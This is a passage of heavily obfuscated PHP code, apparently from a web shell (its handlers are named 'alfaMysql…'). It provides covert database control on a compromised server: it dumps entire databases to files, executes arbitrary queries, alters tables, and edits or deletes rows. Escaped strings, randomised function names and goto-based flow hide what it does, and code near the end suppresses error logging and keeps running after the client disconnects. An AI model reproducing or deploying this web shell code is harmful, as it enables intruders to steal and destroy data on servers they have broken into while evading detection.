@fopen($db["\x64\165\x6d\160\x5f\x66\x69\x6c\x65"], "\x77"); foreach ($db["\x74\x61\x62\154\x65\x73"] as $table) { $res = @mysqli_query($conn, "\x53\110\117\x57\40\x43\122\105\101\124\105\40\x54\101\102\x4c\105\x20\140" . $table . "\x60"); $create = @mysqli_fetch_array($res); $sql = "\x44\122\x4f\x50\40\x54\101\x42\x4c\x45\x20\x49\106\40\105\x58\x49\x53\124\123\x20\x60" . $table . "\140\73\xa" . $create[1] . "\73\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $tbl_data = @mysqli_query($conn, "\x53\105\114\105\x43\124\40\x2a\x20\106\122\117\x4d\40\x60" . $table . "\140"); $head = true; while ($item = @mysqli_fetch_assoc($tbl_data)) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "\47\x27"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "\x27" . @mysqli_real_escape_string($conn, $v) . "\x27"; } $columns[] = "\x60" . $k . "\x60"; } if ($head) { $sql = "\111\x4e\123\x45\x52\x54\x20\x49\116\x54\117\x20\140" . $table . "\x60\40\50" . implode("\x2c\x20", $columns) . "\x29\x20\x56\101\114\125\105\x53\40\xa\x9\50" . implode("\x2c\40", $item) . "\x29"; $head = false; } else { $sql = "\xa\11\54\x28" . implode("\54\40", $item) . "\x29"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } if (!$head) { if ($fp) { fwrite($fp, "\73\12\12"); } else { echo "\73\xa\12"; } } } } echo @json_encode(array("\163\x74\141\x74\165\x73" => true, "\146\x69\x6c\x65" => $db["\x64\165\155\x70\137\146\x69\x6c\145"])); } } elseif ($type == "\x6c\157\x61\144\x5f\x74\x61\x62\154\145\x73") { $tables = array(); $q_tables = @mysqli_query($conn, "\123\110\x4f\x57\40\x54\x41\x42\114\x45\123\73"); $count = 0; while ($row = @mysqli_fetch_array($q_tables)) { if ($sql_count) { $count_q = @mysqli_query($conn, "\123\x45\x4c\x45\x43\x54\40\x43\117\x55\x4e\124\x28\x2a\x29\40\x46\122\117\x4d\x20\140" . $row[0] . "\x60"); if ($count_q) { $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("\x6e\x61\x6d\145" => $row[0], "\x63\157\165\156\x74" => (int) $count); } echo @json_encode($tables); } elseif ($type == "\x61\x6c\164\145\162") { $db["\x61\x6c\x74\x65\x72"]["\x74\171\x70\145"] = strtolower($db["\x61\x6c\164\145\x72"]["\164\171\x70\x65"]); $inputs = $db["\141\x6c\164\145\x72"]["\x74\171\x70\x65"] . "\x28" . $db["\141\x6c\164\x65\162"]["\x69\x6e\160\x75\x74"] . "\51"; $text_input = array("\x6c\x6f\x6e\x67\x74\145\x78\164", "\164\x65\170\x74", "\x6d\145\144\151\165\155\x74\x65\170\164", "\164\x69\156\x79\164\145\170\164"); if (in_array($db["\x61\x6c\x74\145\x72"]["\164\171\160\145"], $text_input)) { $inputs = $db["\x61\x6c\164\145\x72"]["\x74\171\160\145"]; } @mysqli_query($conn, "\x41\114\124\x45\x52\x20\124\x41\x42\114\x45\40\x60" . $db["\164\141\x62\154\x65"] . "\x60\x20\x4d\x4f\104\x49\106\131\40\x43\117\114\x55\x4d\116\x20\x60" . $db["\x63\157\x6c\165\x6d\156"] . "\x60\x20" . $inputs); $error = @mysqli_error($conn); if ($error) { echo $error; } else { echo "\x6f\153"; } } elseif ($type == "\145\144\151\x74" || $type == "\x64\x65\154\x65\x74\x65" || $type == "\x64\x65\154\x65\164\x65\137\x61\154\x6c") { if ($type == "\x65\144\x69\164") { $q = @mysqli_query($conn, "\123\105\x4c\x45\103\x54\x20\52\40\106\122\x4f\115\40\140" . $db["\x64\142"] . "\140\56\140" . $db["\x74\x61\142\154\x65"] . "\140\40\127\110\x45\122\105\40\x60" . $db["\143\157\x6c\x5f\x6b\x65\171"] . "\x60\x20\75\40\x27" . addslashes($db["\153\x65\x79"]) . "\47\40\114\x49\x4d\x49\x54\x20\x30\54\61"); $row = @mysqli_fetch_assoc($q); if ($row) { $columns_query = @mysqli_query($conn, "\x53\x45\114\x45\x43\124\40\x43\117\114\125\x4d\116\x5f\116\x41\x4d\105\40\x61\163\x20\x6e\x61\x6d\145\x2c\x20\x43\117\x4c\125\115\x4e\137\x54\x59\x50\105\x2c\x20\104\101\124\101\x5f\x54\x59\x50\105\x20\141\163\40\164\171\x70\145\40\106\x52\x4f\115\40\x69\x6e\146\157\x72\155\141\x74\x69\157\156\x5f\163\143\150\145\x6d\141\56\x63\157\x6c\165\x6d\x6e\x73\x20\127\110\105\x52\105\40\140\124\101\x42\114\x45\137\x53\x43\x48\105\115\101\140\x20\75\40\x27" . $db["\144\x62"] . "\47\x20\x41\x4e\104\40\140\124\x41\102\x4c\105\137\x4e\101\x4d\105\140\40\x3d\x20\47" . $db["\x74\141\142\x6c\x65"] . "\x27"); $columns = array(); $edit_data = array(); while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $input = array("\x63\x6f\154\x5f\x74\171\160\x65" => $row2["\103\x4f\x4c\x55\x4d\x4e\137\x54\x59\x50\105"]); $row2["\x74\171\160\145"] = strtolower($row2["\164\x79\160\145"]); switch ($row2["\x74\x79\x70\x65"]) { case "\x6c\157\156\147\164\145\170\x74": case "\x74\x65\170\x74": case "\155\145\x64\151\165\x6d\x74\x65\170\164": case "\x74\151\x6e\171\x74\x65\x78\x74": $input["\x74\141\147"] = "\164\x65\x78\164\141\162\145\141"; break; case "\x69\156\x74": case "\163\x6d\x61\x6c\154\151\156\164": case "\142\151\147\x69\156\x74": case "\164\151\x6e\x79\151\x6e\164": case "\155\145\144\x69\x75\155\x69\156\164": $input["\164\141\147"] = "\x69\x6e\x70\165\x74"; $input["\164\171\x70\145"] = "\x6e\165\x6d\142\145\x72"; break; default: $input["\x74\141\147"] = "\x69\x6e\160\x75\x74"; $input["\x74\x79\160\x65"] = "\164\x65\170\164"; } $columns[$row2["\156\141\x6d\x65"]] = $input; } foreach ($row as $key => $v) { $edit_data[] = array("\143\157\x6c" => $key, "\x76\x61\x6c\x75\145" => htmlspecialchars($v, ENT_QUOTES, "\125\x54\x46\x2d\x38"), "\x74\x79\160\145" => $columns[$key]); } echo @json_encode($edit_data); } } else { if ($type == "\x64\x65\154\x65\x74\145\137\141\154\x6c") { $rows = implode("\47\54\x20\x27", $db["\162\157\x77\x73"]); } else { $rows = addslashes($db["\153\145\x79"]); } $query = "\x44\x45\114\x45\x54\105\40\x46\x52\117\115\x20\140" . $db["\x64\142"] . "\x60\x2e\x60" . $db["\164\141\142\x6c\145"] . "\140\40\x57\110\x45\x52\105\40\140" . $db["\143\157\154\137\153\x65\171"] . "\140\40\x49\x4e\40\x28\x27" . $rows . "\47\51"; @mysqli_query($conn, $query); $error = @mysqli_error($conn); if ($error) { $status = false; } else { $status = true; } echo @json_encode(array("\x73\x74\141\x74\x75\x73" => $status, "\x65\162\x72\157\x72" => $error, "\x71\x75\x65\x72\x79" => $query)); } } elseif ($type == "\x75\x70\x64\x61\x74\145") { $query = "\x55\x50\104\101\124\x45\x20\x60" . $db["\x64\x62"] . "\140\x2e\x60" . $db["\x74\x61\x62\x6c\x65"] . "\x60\40\123\x45\x54\40"; foreach ($db["\144\141\164\141"] as $col => $val) { $query .= "\x60" . $col . "\x60\x20\x3d\40\47" . mysqli_real_escape_string($conn, $val) . "\47\x2c"; } $query = substr($query, 0, -1); $query .= "\x57\x48\105\x52\105\40\x60" . $db["\143\157\154\x5f\x6b\145\171"] . "\x60\40\x3d\x20\x27" . $db["\153\x65\x79"] . "\x27"; $res = @mysqli_query($conn, $query); echo @json_encode(array("\x73\x74\141\x74\165\x73" => $res, "\x65\162\x72\157\x72" => @mysqli_error($conn))); } elseif ($type == "\x69\x6e\163\x65\162\x74") { $query = "\x49\116\123\105\122\x54\40\x49\116\x54\x4f\40\x60" . $db["\x64\142"] . "\x60\x2e\x60" . $db["\164\x61\142\x6c\145"] . "\x60\40"; foreach ($db["\x64\x61\164\x61"] as $col => $val) { $cols .= $col . "\54"; $vals .= "\x27" . mysqli_real_escape_string($conn, $val) . "\47\54"; } $cols = substr($cols, 0, -1); $vals = substr($vals, 0, -1); $query = $query . "\50" . $cols . "\51" . "\126\x41\x4c\x55\105\123\50" . $vals . "\51"; $res = @mysqli_query($conn, $query); echo @json_encode(array("\x73\x74\141\164\165\163" => $res, "\145\x72\x72\x6f\162" => @mysqli_error($conn))); } else { $pages = 0; $title = false; $query = ''; $tbl_content = "\x3c\x74\141\142\154\145\x20\167\x69\x64\x74\x68\x3d\x22\61\60\60\45\42\40\143\x65\154\154\163\x70\x61\x63\151\x6e\147\x3d\x22\x31\42\x20\x63\145\x6c\x6c\160\141\x64\x64\x69\x6e\x67\75\42\x32\42\40\x63\154\141\163\163\x3d\x22\x6d\x61\x69\x6e\x20\x6d\171\163\x71\x6c\x2d\144\141\164\141\x2d\x74\x62\x6c\x22\40\163\164\171\x6c\x65\75\42\x62\141\x63\153\x67\x72\157\x75\156\x64\55\143\x6f\x6c\x6f\162\72\x23\62\x39\x32\x39\x32\x39\x22\76"; $line = 0; $tables = array(); $columns = array(); if ($type == "\x6c\x6f\141\144\x5f\144\141\164\141") { $query = "\123\x45\114\105\x43\x54\x20\52\40\x46\122\117\x4d\40\140" . $db["\x64\x62"] . "\140\x2e\x60" . $db["\x74\x61\142\x6c\145"] . "\140\x20\x4c\x49\x4d\x49\x54\x20\x30\x2c\63\x30"; $tbl_count_q = @mysqli_query($conn, "\x53\105\x4c\x45\x43\124\x20\103\117\125\x4e\124\x28\52\x29\40\x46\x52\117\x4d\x20\140" . $db["\x64\142"] . "\x60\56\x60" . $db["\164\x61\x62\154\145"] . "\x60"); $tbl_count = @mysqli_fetch_row($tbl_count_q); $columns_query = @mysqli_query($conn, "\123\105\114\105\103\x54\x20\103\x4f\x4c\125\115\x4e\137\x4e\x41\x4d\x45\x20\x61\163\x20\156\141\155\145\x2c\40\x43\117\x4c\125\115\x4e\137\124\x59\x50\105\x20\141\x73\x20\164\x79\160\145\x2c\40\103\117\x4c\x4c\x41\x54\x49\x4f\116\x5f\116\x41\115\x45\x20\x61\163\40\143\157\154\x6c\x61\x74\151\157\x6e\x2c\40\x44\x41\124\x41\x5f\124\131\120\105\x20\x61\163\x20\144\141\x74\x61\x5f\x74\x79\x70\145\54\x20\x43\110\101\x52\x41\x43\124\x45\x52\137\115\x41\x58\111\x4d\x55\x4d\137\x4c\105\116\107\124\x48\40\x61\x73\40\x74\171\160\145\137\x76\141\154\165\x65\40\106\x52\x4f\115\40\x69\x6e\x66\157\162\x6d\x61\x74\x69\x6f\x6e\137\163\x63\150\145\155\x61\x2e\x63\157\154\x75\x6d\156\x73\x20\x57\110\105\122\x45\x20\x60\124\x41\x42\114\x45\x5f\123\x43\110\x45\x4d\x41\x60\40\75\40\x27" . $db["\144\142"] . "\47\x20\x41\116\104\x20\x60\124\x41\x42\x4c\x45\137\x4e\101\115\x45\x60\x20\75\40\47" . $db["\164\141\x62\x6c\145"] . "\x27"); while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) { $columns[] = $row2; } if ($tbl_count[0] > 30) { $pages = ceil($tbl_count[0] / 30); } } elseif ($type == "\161\165\145\162\171") { $query = $db["\161\165\145\x72\171"]; } elseif ($type == "\160\x61\147\145") { $db["\160\x61\147\x65"] = (int) $db["\x70\141\x67\x65"] - 1; $query = "\x53\x45\x4c\x45\103\x54\40\52\x20\106\122\117\x4d\x20\x60" . $db["\144\x62"] . "\x60\56\140" . $db["\164\141\142\x6c\145"] . "\x60\x20\x4c\111\x4d\111\x54\x20" . $db["\160\141\147\145"] * 30 . "\x2c\63\60"; } elseif ($type == "\163\145\x61\x72\x63\x68") { $search = ''; $search_noval = array("\75\40\47\x27", "\x21\75\40\47\x27", "\111\x53\40\x4e\x55\x4c\114", "\x49\x53\40\116\117\x54\x20\116\x55\114\x4c"); foreach ($db["\163\x65\141\x72\x63\150"] as $col => $val) { $search_noval_r = in_array($val["\157\160\x74"], $search_noval); if (empty($val["\166\x61\154\165\145"]) && !$search_noval_r) { continue; } if (strstr($val["\157\160\164"], "\56\56\x2e") || $search_noval_r) { $val["\157\x70\x74"] = str_replace("\56\56\56", $val["\166\x61\154\165\145"], $val["\x6f\x70\164"]); $search .= $col . "\x20" . $val["\157\x70\x74"] . "\x20\x41\x4e\x44\x20"; } else { $search .= $col . "\x20" . $val["\x6f\160\164"] . "\x20\47" . addslashes($val["\x76\141\154\x75\x65"]) . "\47\x20\x41\x4e\104\40"; } } $search .= "\61\75\61"; $query = "\123\x45\x4c\105\103\x54\40\x2a\40\106\x52\x4f\x4d\x20\140" . $db["\x64\142"] . "\140\56\140" . $db["\x74\x61\x62\x6c\145"] . "\x60\40\x57\x48\105\x52\105\40" . $search; } $q_tables = @mysqli_query($conn, $query); if (!$q_tables) { echo @json_encode(array("\x73\164\141\164\165\163" => false, "\x65\x72\x72\157\162" => @mysqli_error($conn), "\x71\165\145\x72\171" => $query)); return false; } $col_key = @mysqli_query($conn, "\123\x45\x4c\105\103\x54\x20\x43\x4f\x4c\125\x4d\116\137\116\x41\115\x45\40\x46\x52\x4f\115\40\x49\x4e\106\x4f\122\115\101\x54\111\117\x4e\x5f\x53\103\110\105\x4d\101\x2e\103\117\x4c\x55\115\116\123\40\x57\x48\x45\x52\x45\x20\x54\101\102\x4c\105\x5f\123\103\110\x45\115\101\40\75\x20\x27" . @addslashes($db["\x64\x62"]) . "\47\40\x41\x4e\104\40\x54\x41\x42\x4c\105\x5f\116\101\115\105\x20\75\40\47" . @addslashes($db["\x74\x61\142\154\145"]) . "\x27\40\x41\116\104\40\103\x4f\x4c\x55\115\x4e\x5f\113\105\131\x20\75\x20\47\x50\x52\x49\x27"); if ($col_key) { $col_key = @mysqli_fetch_row($col_key); $col_key = $col_key[0]; if (!empty($col_key)) { $tbl_content = "\x3c\144\151\166\40\x73\x74\x79\x6c\145\75\42\155\141\x72\x67\151\156\x2d\142\x6f\x74\164\x6f\x6d\x3a\x35\160\170\73\x6d\x61\x72\147\x69\x6e\x2d\164\157\160\72\65\160\170\x3b\42\x3e\x3c\142\165\164\x74\157\156\x20\x63\x6f\x6c\x5f\x6b\x65\x79\x3d\x22" . $col_key . "\x22\40\164\142\x6c\137\x6e\x61\155\145\75\42" . $db["\x74\x61\x62\x6c\145"] . "\x22\40\144\x62\137\x69\x64\75\x22" . $db["\x64\x62\x5f\x69\144"] . "\42\x20\x9\x64\x62\x5f\164\141\x72\147\x65\x74\75\x22" . $db["\x64\142"] . "\42\x20\157\156\143\154\151\x63\x6b\75\x22\x61\154\146\141\x4d\x79\x73\x71\154\x44\x65\x6c\145\x74\145\101\154\154\123\145\x6c\145\x63\x74\145\144\162\157\167\x73\50\x74\150\x69\x73\51\x3b\162\x65\x74\x75\162\156\x20\x66\141\x6c\163\x65\73\42\76\x44\x65\154\x65\164\x65\40\x53\x65\154\x65\143\x74\145\x64\40\x52\x6f\x77\163\x3c\57\x62\165\x74\x74\x6f\x6e\x3e\x3c\57\144\151\166\x3e\x3c\x74\141\142\154\x65\40\167\x69\144\x74\150\75\x22\x31\60\x30\45\42\x20\x63\x65\154\x6c\x73\160\141\143\x69\x6e\147\75\42\61\x22\40\143\145\x6c\x6c\x70\141\144\144\151\156\x67\75\42\x32\42\x20\143\154\141\x73\x73\x3d\42\x6d\141\x69\156\x20\x6d\171\163\x71\154\x2d\x64\141\164\x61\55\164\142\154\42\x20\x73\164\171\x6c\x65\x3d\x22\x62\x61\143\153\x67\x72\157\x75\x6e\x64\55\143\x6f\x6c\157\x72\72\43\62\x39\62\x39\62\71\42\76"; } } else { $col_key = false; } while ($item = @mysqli_fetch_assoc($q_tables)) { if (!$title) { $tbl_content .= "\74\164\162\x20\163\164\x79\x6c\x65\75\42\x62\x61\x63\153\x67\162\157\x75\x6e\x64\55\x63\x6f\x6c\157\162\72\x23\63\60\65\142\x38\145\73\x22\76"; if ($col_key) { $tbl_content .= "\74\164\150\40\x73\x74\x79\x6c\145\75\42\167\151\144\164\x68\72\40\65\65\x70\x78\x3b\164\x65\170\164\x2d\x61\x6c\151\147\156\72\x63\145\156\x74\145\162\73\42\76\74\x69\156\x70\x75\164\x20\144\142\137\x69\x64\x3d\x22" . $db["\144\142\x5f\x69\x64"] . "\x22\x20\157\156\143\150\141\x6e\x67\x65\75\42\141\154\x66\x61\115\x79\x73\x71\x6c\124\142\154\123\145\154\145\143\x74\x41\x6c\154\50\164\150\151\x73\x29\73\42\x20\x74\x79\160\x65\x3d\x22\143\150\x65\143\x6b\x62\x6f\170\x22\76\74\57\164\150\76\74\x74\150\x20\x73\164\171\x6c\145\x3d\42\x77\x69\x64\x74\x68\x3a\x20\65\x35\160\x78\73\x74\x65\170\164\x2d\141\154\x69\x67\x6e\72\x63\145\x6e\164\x65\x72\x3b\42\76\105\x64\x69\164\x3c\x2f\x74\150\76\x3c\x74\150\x20\x73\164\171\x6c\145\x3d\x22\167\x69\x64\x74\150\72\40\x35\65\x70\170\73\164\145\x78\x74\x2d\141\x6c\x69\147\156\72\x63\x65\156\164\145\x72\73\42\x3e\104\x65\x6c\145\164\145\x3c\57\x74\150\76"; } foreach ($item as $key => $value) { $tbl_content .= "\74\164\x68\76" . $key . "\x3c\57\164\150\x3e"; } reset($item); $title = true; $tbl_content .= "\x3c\x2f\x74\162\76\x3c\x74\x72\x3e"; } if ($col_key) { $cacheMsg = "\74\x74\144\40\163\164\x79\154\x65\75\x22\164\145\170\x74\55\141\x6c\x69\x67\x6e\x3a\x63\x65\156\164\x65\162\73\x22\76\74\x69\156\x70\x75\164\40\x72\157\x77\137\151\x64\x3d\x22" . $line . "\42\x20\164\x79\x70\x65\x3d\x22\x63\x68\x65\143\153\142\157\x78\x22\x20\156\141\x6d\145\75\x22\x74\142\x6c\x5f\162\157\x77\163\x5f\x63\x68\145\x63\x6b\142\x6f\x78\133\x5d\x22\x20\166\x61\154\165\x65\x3d\x22" . $item[$col_key] . "\x22\x3e\x3c\57\164\144\76\74\164\144\x20\x73\164\x79\x6c\145\75\42\x74\145\x78\164\x2d\x61\x6c\x69\147\156\x3a\143\x65\156\x74\x65\x72\73\x22\x3e\x3c\x61\40\x63\x6c\141\x73\163\x3d\x22\144\x62\x2d\157\160\164\55\x69\144\42\x20\150\162\x65\x66\75\x22\152\141\x76\x61\x73\143\162\x69\x70\x74\72\x76\x6f\x69\144\50\x30\x29\x3b\x22\40\144\x62\137\x69\x64\x3d\x22" . $db["\x64\x62\137\151\144"] . "\x22\40\x64\x62\x5f\x74\141\162\x67\145\164\75\42" . $db["\144\142"] . "\42\x20\x74\142\x6c\x5f\x6e\x61\x6d\x65\75\42" . $db["\164\141\142\x6c\145"] . "\42\x20\x63\157\x6c\137\x6b\145\171\75\x22" . $col_key . "\42\40\153\145\x79\75\x22" . $item[$col_key] . "\42\40\157\x6e\x63\x6c\151\143\153\x3d\42\141\x6c\146\141\x4d\x79\163\x71\x6c\x45\144\x69\x74\x52\x6f\167\x28\x74\x68\x69\163\x2c\40\x27\145\x64\151\164\47\x29\73\42\40\163\164\x79\154\145\x3d\x22\143\157\x6c\157\x72\x3a\x23\60\141\x63\x61\141\66\x3b\42\76\x45\144\151\164\x3c\x2f\x61\76\74\57\x74\x64\x3e\x3c\x74\144\40\163\164\171\x6c\x65\x3d\42\x74\x65\170\164\55\141\x6c\151\147\x6e\72\x63\145\x6e\164\145\162\73\x22\76\74\141\x20\x63\154\141\x73\x73\x3d\42\144\x62\55\157\x70\164\x2d\x69\x64\42\x20\x68\162\x65\x66\75\x22\152\141\x76\x61\163\143\162\x69\x70\x74\x3a\166\157\151\144\x28\60\51\x3b\x22\40\144\142\x5f\151\144\x3d\42" . $db["\144\x62\137\151\144"] . "\x22\40\144\x62\x5f\x74\141\x72\x67\145\x74\x3d\x22" . $db["\x64\x62"] . "\42\x20\x74\x62\x6c\x5f\x6e\x61\x6d\145\75\42" . $db["\x74\141\x62\x6c\x65"] . "\x22\x20\x63\157\154\x5f\x6b\145\x79\x3d\42" . $col_key . "\x22\x20\153\145\171\x3d\42" . $item[$col_key] . "\x22\x20\x72\x6f\167\x5f\x69\x64\x3d\x22" . $line . "\42\x20\157\x6e\x63\154\151\x63\x6b\x3d\42\x61\x6c\x66\x61\x4d\x79\x73\x71\x6c\105\144\x69\x74\122\157\x77\x28\x74\150\x69\163\54\40\47\144\145\154\145\164\x65\x27\x29\73\x22\x20\163\x74\171\154\145\x3d\x22\x63\157\154\157\x72\72\43\146\146\61\145\x31\x65\73\42\76\x44\145\154\145\x74\x65\74\57\x61\76\74\57\x74\x64\76"; } $tbl_content .= "\x3c\164\x72\40\x63\x6c\x61\163\163\75\x22\164\142\154\x5f\162\x6f\x77\40\164\142\154\x5f\162\x6f\x77\x5f\x6c" . $line . "\x22\x3e" . $cacheMsg; $line++; foreach ($item as $key => $value) { if ($value == null) { $tbl_content .= "\x3c\x74\x64\76\x3c\151\x3e\156\x75\x6c\x6c\x3c\57\x69\x3e\74\x2f\x74\x64\76"; } else { $tbl_content .= "\x3c\x74\144\76" . nl2br(htmlspecialchars($value)) . "\x3c\x2f\x74\x64\76"; } } $tbl_content .= "\74\x2f\164\x72\76"; } $tbl_content .= "\74\x2f\x74\141\142\x6c\145\x3e"; if (!$title) { $tbl_content = "\74\x64\151\x76\40\163\x74\171\x6c\145\x3d\47\x70\x61\x64\x64\x69\x6e\147\72\65\160\170\x3b\142\x6f\x72\144\145\x72\72\x31\x70\x78\40\x64\x61\x73\x68\145\x64\x3b\x6d\x61\x72\x67\x69\x6e\72\61\60\160\x78\x3b\47\76\124\x61\142\154\x65\x20\151\x73\x20\145\x6d\160\x74\171\x2e\56\x2e\74\57\144\151\x76\x3e"; } echo @json_encode(array("\163\x74\141\164\x75\x73" => true, "\x74\x61\x62\154\145" => $tbl_content, "\143\x6f\x6c\x75\155\156\163" => $columns, "\x70\x61\147\145\x73" => $pages, "\x71\165\145\162\x79" => $query)); } @mysqli_close($conn); } } goto ROY6n; It5ls: if (!$CWppUDJxuf("\x62" . "\141" . "\163\145\66\64" . "\137\145\156" . "\x63" . "\157\144\145" . '')) { function vcnvSCZgBz($data) { if (empty($data)) { return; } $b64 = "\101\102\x43\104\x45\x46\x47\110\x49\112\x4b\x4c\x4d\x4e\x4f\120\121\122\123\x54\125\x56\x57\130\131\x5a\x61\142\143\144\145\x66\147\x68\x69\152\x6b\x6c\x6d\x6e\x6f\x70\x71\162\x73\164\165\x76\167\170\171\x7a\x30\x31\62\63\x34\x35\66\67\70\x39\x2b\x2f\75"; $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0; $ac = 0; $enc = ''; $tmp_arr = array(); if (!$data) { return $data; } do { $o1 = $aztJtafUXm($data, $i++); $o2 = $aztJtafUXm($data, $i++); $o3 = $aztJtafUXm($data, $i++); $bits = $o1 << 16 | $o2 << 8 | $o3; $h1 = $bits >> 18 & 63; $h2 = $bits >> 12 & 63; $h3 = $bits >> 6 & 63; $h4 = $bits & 63; $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4); } while ($i < strlen($data)); $enc = implode($tmp_arr, ''); $r = strlen($data) % 3; return ($r ? substr($enc, 0, $r - 3) : $enc) . substr("\x3d\x3d\x3d", $r || 3); } function charCodeAt($data, $char) { return ord(substr($data, $char, 1)); } function charAt($data, $char) { return substr($data, $char, 1); } } else { function vcnvSCZgBz($s) { $b = "\142" . "\141" . "\163\x65\66\64" . "\x5f\145\x6e" . "\x63" . "\x6f\x64\145" . ''; return $b($s); } } goto L1x_B; TLuCO: @ignore_user_abort(true); goto pHU3v; u4yR4: @ini_set("\x65\162\x72\x6f\162\x5f\x6c\x6f\x67", NULL); got